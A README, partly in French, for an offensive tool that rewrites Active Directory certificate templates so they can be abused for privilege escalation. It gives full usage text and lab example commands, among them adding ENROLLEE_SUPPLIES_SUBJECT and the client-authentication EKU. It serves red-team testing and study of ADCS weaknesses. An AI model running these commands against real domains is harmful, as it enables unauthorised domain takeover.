
Modification de modèle de certificat ADCS et énumération des ACL
Cet outil est conçu pour aider un opérateur à modifier les modèles de certificats ADCS afin qu'un état vulnérable créé puisse être exploité pour une élévation de privilèges (puis réinitialiser le modèle à son état précédent par la suite). Il est spécifiquement conçu pour un scénario où les droits WriteProperty sur un modèle ont été compromis, mais l'opérateur ne sait pas à quelles propriétés ce droit s'applique. Dans ce scénario, l'ACL du modèle peut être interrogée et les informations ACE applicables peuvent être recoupées avec les GUID de propriété pour déterminer les propriétés modifiables.
Article de blog associé blog post sur l'outil et le sujet.
usage: modifyCertTemplate.py [-h] -template template name [-property property name] [-value new value] [-get-acl] [-dn distinguished name] [-raw] [-add flag name] [-debug]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-ldaps]
target
Modify the attributes of an Active Directory certificate template
positional arguments:
target [[domain/]username[:password]
optional arguments:
-h, --help show this help message and exit
-template template name
Name of the target certificate template
-property property name
Name of the target template property
-value new value Value to set the specified template property to
-get-acl Print the certificate's ACEs
-dn distinguished name
Explicitly set the distinguished name of the certificate template
-raw Output the raw certificate template attributes
-add flag name Add a flag to an attribute, maintaining the existing flags
-debug Turn DEBUG output ON
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will
use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ldaps Use LDAPS instead of LDAP
Interroger un modèle de certificat (tous les attributs)
python3 modifyCertTemplate.py -template KerberosAuthentication ez.lab/administrator:pass
Interroger un seul attribut d'un modèle de certificat
python3 modifyCertTemplate.py -template KerberosAuthentication -property msPKI-Certificate-Name-Flag ez.lab/administrator:pass
Interroger les valeurs brutes de tous les attributs du modèle
python3 modifyCertTemplate.py -template KerberosAuthentication -raw ez.lab/administrator:pass
Interroger l'ACL d'un modèle de certificat
python3 modifyCertTemplate.py -template KerberosAuthentication -get-acl ez.lab/administrator:pass
Bien que sans lien avec les modèles de certificats, l'ACL de n'importe quel objet peut être interrogée en fournissant son nom distinctif
python3 modifyCertTemplate.py -dn "CN=ws1,CN=computers,DC=ez,DC=lab" -get-acl ez.lab/administrator:pass
Ajouter le drapeau ENROLLEE_SUPPLIES_SUBJECT à la propriété msPKI-Certificate-Name-Flag du modèle
python3 modifyCertTemplate.py -template KerberosAuthentication -add enrollee_supplies_subject -property msPKI-Certificate-Name-Flag ez.lab/administrator:pass
Mettre à jour la valeur d'un attribut du modèle de certificat (propriétés non listées)
python3 modifyCertTemplate.py -template KerberosAuthentication -property msPKI-Certificate-Name-Flag -value -150994944 ez.lab/administrator:pass
Ajouter une EKU à la propriété pKIExtendedKeyUsage
python3 modifyCertTemplate.py -template KerberosAuthentication -add "client authentication" -property pKIExtendedKeyUsage ez.lab/administrator:pass
Mettre à jour la valeur d'un attribut au format liste (c.-à-d. définir explicitement la valeur de pKIExtendedKeyUsage)
python3 modifyCertTemplate.py -template KerberosAuthentication -value "'1.3.6.1.5.5.7.3.4', '1.3.6.1.5.5.7.3.2'" -property pKIExtendedKeyUsage ez.lab/administrator:pass